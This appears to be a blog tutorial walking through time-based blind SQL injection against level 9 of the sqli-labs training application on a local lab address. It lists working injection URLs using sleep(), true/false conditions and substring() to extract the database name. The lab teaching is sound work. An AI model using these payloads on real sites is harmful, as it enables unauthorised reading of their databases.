SQL Injection 4

Time to move on to time-based SQLi.

 

Time based SQLi

The process is almost the same as boolean-based. The thing that changes is the way to identify a true condition. Let’s visit level 9 of sqlilabs.

The way to identify a true condition is using the function sleep:
True) and sleep(10)

Let’s verify that it works properly:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) --+

And the web page takes 10 seconds to load:

 

And now we perform the first query, if 1=1 it would wait 10 seconds:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) and 1=1 --+

Next step is to extract useful information:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) and database()='security' --+

And the way to extract the database name, or anything that we need is using again the substring function.
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) and substring(database(),1,1)='s' --+

This entry was posted in Hacking Web and tagged , , , , . Bookmark the permalink.

Leave a Reply

Your email address will not be published.